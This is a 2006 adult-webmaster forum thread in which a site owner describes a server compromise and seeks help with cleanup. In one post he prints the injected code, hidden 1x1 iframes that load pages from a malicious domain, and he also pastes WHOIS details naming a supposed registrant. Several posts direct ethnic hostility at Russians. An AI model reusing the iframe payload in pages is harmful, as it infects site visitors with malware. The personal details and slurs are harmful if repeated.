Welcome to the GoFuckYourself.com - Adult Webmaster Forum forums.

You are currently viewing our boards as a guest which gives you limited access to view most discussions and access our other features. By joining our free community you will have access to post topics, communicate privately with other members (PM), respond to polls, upload content and access many other special features. Registration is fast, simple and absolutely free so please, join our community today!

If you have any problems with the registration process or your account login, please contact us.

Post New Thread Reply

Register GFY Rules Calendar
Go Back   GoFuckYourself.com - Adult Webmaster Forum > >
Discuss what's fucking going on, and which programs are best and worst. One-time "program" announcements from "established" webmasters are allowed.

 
Thread Tools
Old 12-12-2006, 07:00 PM   #1
x3movies
Registered User
 
Join Date: Sep 2005
Posts: 91
:mad fucking russian hackers!

again, for third time this year my server got fucking hacked and they modified all my .html files and added some fucking iframe with applets and shit. all over my dozens of domains. this is so fucking annoying i cannot take this anymore. how the fuck did they get in? if i only could get them fuckers i i cannot even imagine what i would do. i am so pissed now!

any how, my hosting provider is lookin on how they got in, any ideas on where i should check?

also is there a way to run a shell command to replace a string in all .html files accross a directory structure? i hate to spend next 20 hours going over all my files.

any help is appreciated.
__________________
2B || !2B
x3movies is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 12-12-2006, 07:02 PM   #2
x3movies
Registered User
 
Join Date: Sep 2005
Posts: 91
i am loosing traffic by thousands each fucking minute, damn!
__________________
2B || !2B
x3movies is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 12-12-2006, 07:09 PM   #3
jacked
sperm tail
 
jacked's Avatar
 
Industry Role:
Join Date: May 2004
Location: nj
Posts: 11,019
show the code being added and maybe we can help you a little more
__________________
Got Cam Models?
icq: 361-607-616
jacked is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 12-12-2006, 07:13 PM   #4
Jon Clark - BANNED FOR LIFE
North Coast Pimp
 
Join Date: Dec 2005
Location: 304-534-757
Posts: 9,395
First step is not calling them "fucking" anything.....

It is best to be nice to the Russians, Treat them the same as you would like to be treated....
Jon Clark - BANNED FOR LIFE is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 12-12-2006, 07:15 PM   #5
NemesiS876
Confirmed User
 
Industry Role:
Join Date: May 2006
Posts: 7,436
Trie to defend whit Kaspersky
NemesiS876 is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 12-12-2006, 07:18 PM   #6
JOHNNY_BUTTHOLES
Confirmed User
 
Join Date: Jun 2006
Posts: 146
those cockfaces got me again today too. i had been free of them for a couple months now. i found it on a site i don't check regularly, so i don't know how many of my surfers got infected. fuck
__________________
JOHNNY_BUTTHOLES is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 12-12-2006, 07:24 PM   #7
deniska
Confirmed User
 
Industry Role:
Join Date: Mar 2001
Location: Miami Beach, FL
Posts: 1,053
if your with a good managed hosting provider, things like this would not happen.
deniska is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 12-12-2006, 07:25 PM   #8
rockbear
Confirmed User
 
Join Date: Jul 2003
Posts: 806
What is your host?
rockbear is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 12-12-2006, 07:33 PM   #9
x3movies
Registered User
 
Join Date: Sep 2005
Posts: 91
i host with Webair.com, they were able to remove this IFRAME from all my files, so temporarily i am okay. but i still need to know how they got in so it does not happen again.

I dont hate every Russian, but why is like 99.9% of todays worlds hackers are Russians, they fucking suck and should die!

any how the code they included is as follows:
WARNING: access the page on your own rist it loads some applets and shit:

Code:
<iframe src='http://dgfjhewfndsbfsdvf.biz/adv/167/new.php' width=1 height=1></iframe><iframe src='http://dgfjhewfndsbfsdvf.biz/adv/new.php?adv=167' width=1 height=1></iframe>
__________________
2B || !2B
x3movies is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 12-12-2006, 07:34 PM   #10
x3movies
Registered User
 
Join Date: Sep 2005
Posts: 91
Domain Name: DGFJHEWFNDSBFSDVF.BIZ
Domain ID: D15515786-BIZ
Sponsoring Registrar: ONLINENIC, INC. D/B/A CHINA-CHANNEL.COM
Sponsoring Registrar IANA ID: 82
Domain Status: clientTransferProhibited
Registrant ID: OLNIC34919537
Registrant Name: Boriskin Gleb
Registrant Organization: Boriskin Gleb
Registrant Address1: vesekaya 4-155
Registrant City: Novosibirsk
Registrant State/Province: Novosibirsk
Registrant Postal Code: 109880
Registrant Country: Russian Federation
Registrant Country Code: RU
Registrant Phone Number: +7.3098098911
Registrant Facsimile Number: +7.3098098911

Name Server: NS3.ASDBIZ.BIZ
Name Server: NS4.ASDBIZ.BIZ
Created by Registrar: ONLINENIC, INC. D/B/A CHINA-CHANNEL.COM
Last Updated by Registrar: ONLINENIC, INC. D/B/A CHINA-CHANNEL.COM
Domain Registration Date: Tue Dec 05 15:38:47 GMT 2006
Domain Expiration Date: Tue Dec 04 23:59:59 GMT 2007
Domain Last Updated Date: Thu Dec 07 12:05:47 GMT 2006


FUCKING RUSSIAN!
__________________
2B || !2B
x3movies is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 12-12-2006, 08:07 PM   #11
micker
Confirmed User
 
Join Date: Nov 2005
Location: Metro Detroit
Posts: 748
ok, if all the files are in the same directory you can just run this...

cat * | sed 's/$FIND/$REPLACE/g'

change $FIND to what you want to match and $REPLACE with what you want to change it to.
micker is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 12-12-2006, 08:10 PM   #12
JD
Too lazy to set a custom title
 
Industry Role:
Join Date: Sep 2003
Posts: 22,651
:::sigh::: search for "megacount" and you'll see a shitload of threads and about 2 are mine. The ONLY thing that seemed to work was changing every password on the box. That means all scripts/ftp/ssh/etc
JD is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 12-12-2006, 08:12 PM   #13
JOHNNY_BUTTHOLES
Confirmed User
 
Join Date: Jun 2006
Posts: 146
Quote:
Originally Posted by SPeRMiNaToR View Post
:::sigh::: search for "megacount" and you'll see a shitload of threads and about 2 are mine. The ONLY thing that seemed to work was changing every password on the box. That means all scripts/ftp/ssh/etc

not just that. you have to make each file 'read only' which is an even bigger pain in the ass
__________________
JOHNNY_BUTTHOLES is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 12-12-2006, 08:15 PM   #14
JD
Too lazy to set a custom title
 
Industry Role:
Join Date: Sep 2003
Posts: 22,651
Quote:
Originally Posted by JOHNNY_BUTTHOLES View Post
not just that. you have to make each file 'read only' which is an even bigger pain in the ass

trust me, I tried everything and making them read only didn't do shit.
JD is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 12-12-2006, 08:16 PM   #15
x3movies
Registered User
 
Join Date: Sep 2005
Posts: 91
no shit, you guys never found how they got in? amazing....
__________________
2B || !2B
x3movies is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 12-12-2006, 08:21 PM   #16
starpimps
Confirmed User
 
Join Date: Sep 2006
Location: internets
Posts: 6,954
russians are crazy i kno first hand
__________________
Teen Porn Models / Solo Girls
starpimps is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 12-12-2006, 08:48 PM   #17
RawAlex
So Fucking Banned
 
Join Date: Oct 2003
Location: In a house.
Posts: 9,465
x3movies, you might want to closely check your PC and the PC of anyone who has FTP access to your box. You may have a keylogger or similar on your machine sending out stuff.

Also, check every piece of software you are using, from blogs to TGPs and CMS systems... almost every one of them has had some sort of hole in it that can be exploited. Make sure you are up to date, otherwise they will just keep walking in the same hole.
RawAlex is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 12-12-2006, 08:49 PM   #18
Domain Distribution
Ask me about negative cash flow
 
Join Date: May 2006
Posts: 539
russian hackers lol
__________________
Artifical Intelligence AIM Bot ~ $199.00
[email protected]
238102273
Domain Distribution is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 12-13-2006, 07:10 AM   #19
Star 69
Confirmed User
 
Join Date: Nov 2005
Location: Russia
Posts: 8,602
Don't fuck with russians. Not all the russians are hackers.
__________________
e-mail star69
Star 69 is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 12-13-2006, 07:21 AM   #20
Vigilante
Confirmed User
 
Join Date: Nov 2006
Location: Tätervolk City
Posts: 696
Quote:
Originally Posted by Star 69 View Post
Don't fuck with russians. Not all the russians are hackers.

Exactly.. You forgot about drug dealers and simple criminals

As hard as it is but sometimes you have to talk to / pay some blackhats to prevent other blackhats from hijacking you :/
Vigilante is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 12-13-2006, 07:36 AM   #21
drjones
Confirmed User
 
Join Date: Oct 2005
Location: Charlotte, NC
Posts: 908
Quote:
Originally Posted by micker View Post
ok, if all the files are in the same directory you can just run this...

cat * | sed 's/$FIND/$REPLACE/g'

change $FIND to what you want to match and $REPLACE with what you want to change it to.
For a slightly safer version of that command, that will back up your files, and only try to modify .html files, try this.. should run from the document root of your webserver.


perl -pi'.orig' -e 's/$FIND/$REPLACE/g' `find ./ -name "*.html"`

It will back up the all the original files with a .orig extension as it runs, so if you make a mistake with the regex you can start over. The files with the text substitution will have the original file name.
__________________
ICQ: 284903372

Last edited by drjones; 12-13-2006 at 07:37 AM..
drjones is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 12-13-2006, 09:38 AM   #22
DarkJedi
No Refunds Issued.
 
DarkJedi's Avatar
 
Industry Role:
Join Date: Feb 2001
Location: GFY
Posts: 28,300
Quote:
Originally Posted by x3movies View Post
i host with Webair.com
hahahahaha


get a real host dude.
DarkJedi is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 12-13-2006, 09:44 AM   #23
WDjay
Confirmed User
 
Join Date: Feb 2006
Location: So.Cal
Posts: 381
six figure sys admins are worth thier weight in gold
__________________
WDjay is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 12-13-2006, 01:56 PM   #24
Star 69
Confirmed User
 
Join Date: Nov 2005
Location: Russia
Posts: 8,602
Quote:
Originally Posted by Vigilante View Post
Exactly.. You forgot about drug dealers and simple criminals

As hard as it is but sometimes you have to talk to / pay some blackhats to prevent other blackhats from hijacking you :/
A lot of smart people live in Russia
__________________
e-mail star69
Star 69 is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 12-13-2006, 02:05 PM   #25
VicD
ICQ: 304-611-162
 
VicD's Avatar
 
Join Date: Feb 2005
Location: Masterdam
Posts: 13,245
Quote:
Originally Posted by Star 69 View Post
A lot of smart people live in Russia
Every country has smart and dumb people...
VicD is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 12-13-2006, 02:33 PM   #26
Denis_SC
Confirmed User
 
Denis_SC's Avatar
 
Industry Role:
Join Date: Jan 2004
Location: Toronto
Posts: 2,332
Quote:
Originally Posted by Vigilante View Post
Exactly.. You forgot about drug dealers and simple criminals

As hard as it is but sometimes you have to talk to / pay some blackhats to prevent other blackhats from hijacking you :/

Yeah ...

Now stfu and pay me for this month
__________________

Denis B.
ICQ 342-587-607
denis AT detamed.com
Denis_SC is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 12-13-2006, 02:35 PM   #27
Wilbo
Confirmed User
 
Wilbo's Avatar
 
Join Date: Mar 2001
Location: Baltimore
Posts: 2,082
I used to get hit with these guys, then I turned off the ftp server and it stopped. So that would lead me to believe it was an ftp hack.
Wilbo is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 12-13-2006, 03:00 PM   #28
who
So Fucking Banned
 
Join Date: Aug 2003
Location: ICQ #23642053
Posts: 19,593
You guys should look into curing SQL injection.
who is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 12-13-2006, 03:45 PM   #29
micker
Confirmed User
 
Join Date: Nov 2005
Location: Metro Detroit
Posts: 748
Quote:
Originally Posted by drjones View Post
For a slightly safer version of that command, that will back up your files, and only try to modify .html files, try this.. should run from the document root of your webserver.


perl -pi'.orig' -e 's/$FIND/$REPLACE/g' `find ./ -name "*.html"`

It will back up the all the original files with a .orig extension as it runs, so if you make a mistake with the regex you can start over. The files with the text substitution will have the original file name.
I realize now that I had meant for that to be cat *.html and not just the wilcard. It was late when I posted that...

I like your solution better than mine though.. I need to get more comfortable with perl.
micker is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 12-15-2006, 10:04 PM   #30
x3movies
Registered User
 
Join Date: Sep 2005
Posts: 91
:mad

got hit again. i am loosing it...........
__________________
2B || !2B
x3movies is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 12-15-2006, 10:20 PM   #31
jerzeemedia
Confirmed User
 
Industry Role:
Join Date: May 2004
Location: New Jersey
Posts: 1,532
x3movies,

Contact me on ICQ, I can more likely than not help. 251095197

-JM
__________________
Free Adult Blog Hosting
http://www.waqn.com

free porn
www.mojohost.com - Best guys, best host.
jerzeemedia is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 12-15-2006, 10:21 PM   #32
jerzeemedia
Confirmed User
 
Industry Role:
Join Date: May 2004
Location: New Jersey
Posts: 1,532
EDIT: free of charge
__________________
Free Adult Blog Hosting
http://www.waqn.com

free porn
www.mojohost.com - Best guys, best host.
jerzeemedia is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 12-15-2006, 10:31 PM   #33
Nookster
Confirmed IT Professional
 
Industry Role:
Join Date: Nov 2005
Location: Hollywood, CA
Posts: 3,744
Ever heard of back-ups?
Nookster is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 12-15-2006, 11:13 PM   #34
sam from montreal
Confirmed User
 
Join Date: Nov 2003
Location: QC
Posts: 296
i got hacked too... an Iframe installing a Trojan horse
__________________
SEO r0ck st@r

Giving tips 107776092 [email protected]
sam from montreal is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 12-15-2006, 11:34 PM   #35
quantum-x
Confirmed User
 
quantum-x's Avatar
 
Join Date: Feb 2002
Location: ICQ: 251425 Fr/Au/Ca
Posts: 6,863
Get yourself a copy of CentOS and Atomic Secured Linux
[http://atomicorp.com/amember/signup.php]

And kiss all these problems goodbye.
quantum-x is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 12-16-2006, 02:39 AM   #36
porn blogger
Confirmed User
 
Join Date: Aug 2006
Location: ICQ: 55274943
Posts: 737
Quote:
Originally Posted by WDjay View Post
six figure sys admins are worth thier weight in gold
when is the last time you evaluated a sysadmins weight? most of the ones i know are morbidly obese just as the cliche offers.
__________________
heeeeyyyyy now!

^ the real biz, yo.
porn blogger is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 12-16-2006, 05:06 AM   #37
rigrunner
Confirmed User
 
Industry Role:
Join Date: Jan 2004
Location: UK
Posts: 877
i had this a while back host said it was something to do with awstats..
__________________
Get Nasty - Make Bank Here
rigrunner is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Post New Thread Reply
Go Back   GoFuckYourself.com - Adult Webmaster Forum > >

Bookmarks



Advertising inquiries - marketing at gfy dot com

Contact Admin - Advertise - GFY Rules - Top

©2000-, AI Media Network Inc



Powered by vBulletin
Copyright © 2000- Jelsoft Enterprises Limited.